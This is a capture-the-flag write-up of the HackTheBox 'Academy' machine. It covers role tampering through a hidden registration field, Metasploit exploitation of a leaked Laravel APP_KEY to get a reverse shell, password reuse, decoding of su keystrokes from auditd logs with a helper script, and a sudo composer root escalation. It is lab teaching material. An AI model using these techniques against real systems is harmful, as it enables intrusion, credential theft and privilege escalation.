
[HTB] – Academy

Today's write-up is on Academy, an easy HackTheBox box, created to promote the new academy section of the pentest learning platform.

Recon

As usual, I started with an Nmap scan.

┌──(leo㉿kali)-[~/Desktop/HackTheBox/Academy]
└─$ nmap -p- -T4 -A 10.10.10.215 | tee scan.nmap

Starting Nmap 7.91 ( https://nmap.org ) at 2020-12-05 13:14 GMT
Nmap scan report for 10.10.10.215
Host is up (0.036s latency).
Not shown: 65532 closed ports
PORT      STATE SERVICE VERSION
22/tcp    open  ssh     OpenSSH 8.2p1 Ubuntu 4ubuntu0.1 (Ubuntu Linux; protocol 2.0)
| ssh-hostkey: 
|   3072 c0:90:a3:d8:35:25:6f:fa:33:06:cf:80:13:a0:a5:53 (RSA)
|   256 2a:d5:4b:d0:46:f0:ed:c9:3c:8d:f6:5d:ab:ae:77:96 (ECDSA)
|_  256 e1:64:14:c3:cc:51:b2:3b:a6:28:a7:b1:ae:5f:45:35 (ED25519)
80/tcp    open  http    Apache httpd 2.4.41 ((Ubuntu))
|_http-server-header: Apache/2.4.41 (Ubuntu)
|_http-title: Did not follow redirect to http://academy.htb/
33060/tcp open  mysqlx?
| fingerprint-strings: 
|   DNSStatusRequestTCP, LDAPSearchReq, NotesRPC, SSLSessionReq, TLSSessionReq, X11Probe, afp: 
|     Invalid message"
|_    HY000

Network Distance: 2 hops
Service Info: OS: Linux; CPE: cpe:/o:linux:linux_kernel

TRACEROUTE (using port 554/tcp)
HOP RTT      ADDRESS
1   35.77 ms 10.10.14.1
2   35.82 ms 10.10.10.215

OS and Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 60.61 seconds
  • -A : enables OS detection (-O), version detection (-sV), default script scanning (-sC) and traceroute (--traceroute)
  • -p- : scans all 65535 TCP ports (by default Nmap only scans the 1000 most common ones)
  • -T4 : picks an aggressive timing template; faster than the default, at the cost of accuracy on slow or unreliable links

Nothing too fancy here, except two details worth noting: port 33060 is the MySQL X protocol, so a MySQL server is running locally, and the http-title script reports a redirect to http://academy.htb/, so the site expects that hostname. Add "10.10.10.215 academy.htb" to /etc/hosts before going any further. I then fuzzed the website to uncover potentially interesting endpoints. Same thing here: apart from /academy and the usual forbidden /server-status, nothing was discovered.

┌──(leo㉿kali)-[~/Desktop/HackTheBox/Academy]
└─$ gobuster dir -w /usr/share/wordlists/dirbuster/directory-list-2.3-medium.txt -u "http://10.10.10.215" | tee directories.txt 
===============================================================
Gobuster v3.0.1
by OJ Reeves (@TheColonial) & Christian Mehlmauer (@_FireFart_)
===============================================================
[+] Url:            http://10.10.10.215
[+] Threads:        10
[+] Wordlist:       /usr/share/wordlists/dirbuster/directory-list-2.3-medium.txt
[+] Status codes:   200,204,301,302,307,401,403
[+] User Agent:     gobuster/3.0.1
[+] Timeout:        10s
===============================================================
2020/12/05 13:20:52 Starting gobuster
===============================================================
/academy (Status: 301)
/server-status (Status: 403)
===============================================================
2020/12/05 13:34:34 Finished
===============================================================

When exploring the website, you'll find two pages: a registration form and a login form.

After registering and logging in, we get a regular-looking HackTheBox Academy site. It looks good, but it's actually empty.

If you take a closer look at the source code, and in particular that of the registration form:

You probably noticed the input field of type "hidden". Its name is "roleid" and its value is "0". So what we can understand here is that when we POST the request to create an account, an invisible field is systematically filled in for us with the value 0, which determines our role, and therefore the rights we have. A hidden field is not a security control: it lives in the browser, so the user controls it just as much as the username field, and a server that trusts it lets the client pick its own privilege level.

Let's try to create an account with a different roleid. Fire up Burp Suite and fill out the registration form. If your browser proxy is correctly set up to go through Burp Suite, you should be able to intercept the request. You'll see the information you entered, and our clandestine parameter set to "0".

Now just change roleid to 1 and forward the request. You can then turn interception off.
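The same hidden-field tampering, scripted instead of done by hand in Burp, as an added example that is not part of the original write-up. Only the roleid field and its default value of 0 come from the page: the register.php path and the other field names are assumptions, and the form HTML is a constructed mock-up so that the hidden_inputs step runs offline. The register function needs the real host.

```shell
#!/bin/sh
# Added example (not from the original write-up): list hidden form fields and
# resubmit the form with one of them overridden. Field names other than
# roleid, and the register.php path, are assumptions for illustration.

# Constructed mock-up of a registration form; not the real academy.htb source.
SAMPLE_FORM='<form method="post" action="register.php">
  <input type="text" name="uid" placeholder="Username">
  <input type="password" name="password">
  <input type="password" name="confirm">
  <input type="hidden" name="roleid" value="0">
  <input type="submit" value="Register">
</form>'

# Print name=value for every <input type="hidden"> in the HTML read on stdin.
# Hidden fields are the first thing to look at: the browser fills them in for
# you, but nothing stops you from sending a different value.
hidden_inputs() {
  tr '\n' ' ' | grep -o '<input[^>]*>' | grep -i 'type="hidden"' \
    | sed -n 's/.*name="\([^"]*\)".*value="\([^"]*\)".*/\1=\2/p'
}

# Register an account with roleid overridden (default 1) and print the HTTP
# status. Uses the assumed field names above; adjust them after checking the
# real form with hidden_inputs.
# Usage: register http://academy.htb alice 'P4ssw0rd!' 1
register() {
  base=$1; user=$2; pass=$3; role=${4:-1}
  curl -s -o /dev/null -w '%{http_code}\n' \
    --data-urlencode "uid=$user" \
    --data-urlencode "password=$pass" \
    --data-urlencode "confirm=$pass" \
    --data-urlencode "roleid=$role" \
    "$base/register.php"
}

# Offline demonstration on the mock-up: prints "roleid=0".
printf '%s\n' "$SAMPLE_FORM" | hidden_inputs
# Against the live form:  curl -s http://academy.htb/register.php | hidden_inputs
```

Run hidden_inputs against every form you meet, not just registration: any field the server trusts without re-deriving it server-side (role, price, user id) is a candidate for the same trick.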

I at first expected to see a different interface when logging in, but that's not what happened. I tried creating accounts with a few other roleid values, but got the same result. I finally found what to do with my account: there is actually a http://academy.htb/admin.php which looks like the regular login form. It didn't show up in the Gobuster scan because Gobuster was run against the bare IP rather than the academy.htb virtual host, and without -x php, so a file named admin.php was never requested; rerun it with -u http://academy.htb -x php and it appears.

If you log in with an account whose roleid is set to "1" you should get to the following page:

There are two interesting pieces of information here: first, two strings that look like usernames (cry0l1t3 and mrb3n); second, a subdomain (dev-staging-01.academy.htb).

Don't forget to add this domain to your /etc/hosts file along with the academy.htb domain.

Let's see what we can find over there:

It looks like the error page of a debugging tool, left enabled on a staging instance. Regardless of its primary use, it gives away a lot of information about the environment the web application runs in, including its configuration variables and secrets. After going through all these variables, I stumbled on something I didn't know: "Laravel".

Laravel is a free, open-source PHP web framework, created by Taylor Otwell and intended for the development of web applications following the model–view–controller architectural pattern and based on Symfony.

- Google, your best friend when it comes to (almost) any IT matter

I said it in my HackTheBox beginner guide, but if you have a doubt about any technology you encounter, just search for "keyword exploit". It very often gives a good idea of whether you're on the right path.

If you try it with Laravel, you'll see there is a Metasploit module for this PHP framework. The underlying bug is CVE-2018-15133 (fixed in Laravel 5.6.30): the framework decrypts and unserializes the value of the X-XSRF-TOKEN header, so anyone who knows the application's encryption key can send a serialized object that runs commands, and the debug page above hands us exactly that key. If you are not familiar with the Metasploit Framework, that's okay, just follow the next steps and I'll try to keep it simple. (I will maybe write an article on the basic use of Metasploit... hold that thought).

Foothold using Metasploit

First, you should start Metasploit.

sudo msfdb init && msfconsole

Then let's look for our exploit.

msf6 > search laravel

Matching Modules
================

   #  Name                                              Disclosure Date  Rank       Check  Description
   -  ----                                              ---------------  ----       -----  -----------
   0  exploit/unix/http/laravel_token_unserialize_exec  2018-08-07       excellent  Yes    PHP Laravel Framework token Unserialize Remote Command Execution


Interact with a module by name or index. For example info 0, use 0 or use exploit/unix/http/laravel_token_unserialize_exec

We got only one result here. Select the exploit by typing use 0. Then we have to set the right options for the exploit to reach the vulnerable app and give us a shell. It took me a few tries to get it working, because I hadn't understood the role of the newly found domain in all this.

Here is the list of commands you should type in :

  • set RHOSTS academy.htb
    • The host to send the attack to
  • set VHOST dev-staging-01.academy.htb
    • The virtual host, i.e. the Host header to send. The vulnerable Laravel app is only served under this second name on the same server, which is why the exploit fails against academy.htb alone
  • set APP_KEY dBLUaMuZz7Iq06XtL/Xnz/90Ejq+DEEynggqubHWFj0=
    • Laravel's application key, leaked by the debug page we saw earlier. This is not an API key: it is the key the framework uses to encrypt and authenticate cookies and tokens, and the module needs it to produce a validly encrypted X-XSRF-TOKEN carrying the serialized payload
  • set LHOST tun0
    • Your own IP on the HackTheBox network. tun0 is the VPN tunnel interface created when you connect to the HTB VPN (not a wireless interface); check it with ip addr show tun0, or ifconfig tun0

We're now ready to go. Just type exploit to run the module, and you should get a shell. Don't hesitate to use the Python pty module to upgrade it to a proper interactive shell.

msf6 exploit(unix/http/laravel_token_unserialize_exec) > exploit

[*] Started reverse TCP handler on 10.10.14.178:4444 
[*] Command shell session 1 opened (10.10.14.178:4444 -> 10.10.10.215:44258) at 2020-12-06 00:43:29 +0000

id
uid=33(www-data) gid=33(www-data) groups=33(www-data)

python3 -c "import pty;pty.spawn('/bin/bash')"
www-data@academy:/var/www/html/htb-academy-dev-01/public$

Own User

The first step of enumeration for me is to check which users exist and find the one who owns the user.txt file (that's why we're here, remember 😉).

A simple ls /home confirms our earlier theory that there are two users: cry0l1t3 and mrb3n.

If you do ls -la /home/cry0l1t3, you'll see the user.txt file. cry0l1t3 is the user we want to escalate to.

After some basic and boring manual enumeration, I found the /var/www/html/academy/.env file, whose content resembles the information we saw at dev-staging-01.academy.htb. It is slightly different though (this is the production app's configuration, readable by www-data), and one line stands out:

...
DB_PASSWORD=mySup3rP4s5w0rd!!
...

When I get a password like this, I try it against every user, starting with the ones I'm interested in: password reuse between a database and a local account is extremely common.

www-data@academy:/var/www/html/academy$ su cry0l1t3
Password: mySup3rP4s5w0rd!!

$ id
uid=1002(cry0l1t3) gid=1002(cry0l1t3) groups=1002(cry0l1t3),4(adm)
$ 

Nice ! We can now read the user.txt file !

On top of that, these credentials also work for SSH. So if you want to take a break and come back later, you don't have to go through Metasploit again to get back to this point. Just use:

ssh cry0l1t3@academy.htb

Own Root

This part is easy once you understand that you have to log in as mrb3n before becoming root. The hint was, once again, the dev-staging-01.academy.htb page.

Files you should always check are backup files and activity logs. If you look in /var/log you'll see (among other things) an audit folder. auditd is a daemon that records certain activities according to a set of rules; cry0l1t3's membership of the adm group (see the id output above) is typically what grants read access to logs under /var/log. Here is a short introduction to this tool.

If you look at the syntax of the log, you'll notice a comm="command" field. auditd can also record the keystrokes of terminal sessions (type=TTY records), with the typed bytes hex-encoded in a data= field. One way to get a password is therefore to check whether there is any record of someone using the su command (used to log in as another user): whatever they typed at the password prompt is sitting in the log.

In the /var/log/audit folder :

cat * | grep 'comm="su'
type=TTY msg=audit(1597199293.906:84): tty pid=2520 uid=1002 auid=0 ses=1 major=4 minor=1 comm="su" data=6D7262336E5F41634064336D79210A

Find yourself an online hex-to-ASCII converter to read the data, or decode it locally with xxd -r -p; aureport --tty, which comes with auditd, will also render TTY records for you.
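Decoding the keystrokes directly on the box, as an added example that is not part of the original write-up: the first sample record is the one quoted above, the second is constructed filler. It only needs grep, sed and POSIX awk, so it works on a target where xxd is not installed.

```shell
#!/bin/sh
# Added example (not from the original write-up): pull the keystrokes auditd
# recorded for a given command out of type=TTY records and decode the hex
# data= field, which is what the grep-plus-converter step above does by hand.
# Sample records are constructed: the first is the su record quoted above,
# the second is a harmless filler line.
SAMPLE_AUDIT='type=TTY msg=audit(1597199293.906:84): tty pid=2520 uid=1002 auid=0 ses=1 major=4 minor=1 comm="su" data=6D7262336E5F41634064336D79210A
type=TTY msg=audit(1597199300.123:85): tty pid=2521 uid=1002 auid=0 ses=1 major=4 minor=1 comm="bash" data=6C73202D6C610A'

# Decode a hex string on stdin to raw bytes. Pure POSIX awk (no xxd, no
# strtonum), so it runs on a minimal target box.
hex_to_ascii() {
  awk 'BEGIN { h = "0123456789abcdef" }
       { s = tolower($0); out = ""
         for (i = 1; i < length(s); i += 2) {
           hi = index(h, substr(s, i, 1)) - 1
           lo = index(h, substr(s, i + 1, 1)) - 1
           out = out sprintf("%c", hi * 16 + lo)
         }
         printf "%s", out }'
}

# For every TTY record whose comm= matches $1, print who typed it and what.
# Keystrokes logged for su, sudo, ssh or mysql are where passwords end up.
tty_keystrokes() {
  grep "comm=\"$1\"" | while IFS= read -r line; do
    uid=$(printf '%s\n' "$line" | sed -n 's/.*[[:space:]]uid=\([0-9]*\).*/\1/p')
    hex=$(printf '%s\n' "$line" | sed -n 's/.*data=\([0-9A-Fa-f]*\).*/\1/p')
    printf 'uid=%s comm=%s typed: %s\n' "$uid" "$1" "$(printf '%s' "$hex" | hex_to_ascii)"
  done
}

# Offline run on the samples: prints "uid=1002 comm=su typed: mrb3n_Ac@d3my!"
printf '%s\n' "$SAMPLE_AUDIT" | tty_keystrokes su
# On the box (needs read access to the logs, e.g. through the adm group):
#   cat /var/log/audit/audit.log* | tty_keystrokes su
```

The decoded line ends in 0A, the Enter key, which is why the trailing newline is stripped before printing. Rotated logs (audit.log.1 and so on) are worth including: the record that matters here is months old.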

Let's try mrb3n_Ac@d3my! with mrb3n:

$ su mrb3n
Password: mrb3n_Ac@d3my!

$ id
uid=1001(mrb3n) gid=1001(mrb3n) groups=1001(mrb3n)

Nice! The end is pretty straightforward. Check what the user is allowed to run as root through sudo.

$ sudo -l
[sudo] password for mrb3n: mrb3n_Ac@d3my!

Matching Defaults entries for mrb3n on academy:
    env_reset, mail_badpass,
    secure_path=/usr/local/sbin\:/usr/local/bin\:/usr/sbin\:/usr/bin\:/sbin\:/bin\:/snap/bin

User mrb3n may run the following commands on academy:
    (ALL) /usr/bin/composer

A quick search on GTFOBins gives us the set of commands to get a root shell using the /usr/bin/composer binary. Composer runs the "scripts" defined in a composer.json as shell commands, so a composer.json we control, executed through sudo, runs our command as root; the 0<&3 1>&3 2>&3 redirections attach the shell to a descriptor that bypasses composer's own process handling, so the prompt is interactive. The PHP warnings about mysqli.so and the "Do not run Composer as root" message below are just noise: the script still runs.

$ TF=$(mktemp -d)
$ echo '{"scripts":{"x":"/bin/sh -i 0<&3 1>&3 2>&3"}}' >$TF/composer.json
$ sudo composer --working-dir=$TF run-script x
PHP Warning:  PHP Startup: Unable to load dynamic library 'mysqli.so' (tried: /usr/lib/php/20190902/mysqli.so (/usr/lib/php/20190902/mysqli.so: undefined symbol: mysqlnd_global_stats), /usr/lib/php/20190902/mysqli.so.so (/usr/lib/php/20190902/mysqli.so.so: cannot open shared object file: No such file or directory)) in Unknown on line 0
PHP Warning:  PHP Startup: Unable to load dynamic library 'pdo_mysql.so' (tried: /usr/lib/php/20190902/pdo_mysql.so (/usr/lib/php/20190902/pdo_mysql.so: undefined symbol: mysqlnd_allocator), /usr/lib/php/20190902/pdo_mysql.so.so (/usr/lib/php/20190902/pdo_mysql.so.so: cannot open shared object file: No such file or directory)) in Unknown on line 0
Do not run Composer as root/super user! See https://getcomposer.org/root for details
> /bin/sh -i 0<&3 1>&3 2>&3
# id
uid=0(root) gid=0(root) groups=0(root)

And rooted! A nice box to start out with, and to learn the basics of enumeration and privilege escalation: a client-controlled role field, a debug page leaking the app key, reused passwords, keystrokes in the audit log and a sudo rule on a build tool. Hope you enjoyed ^^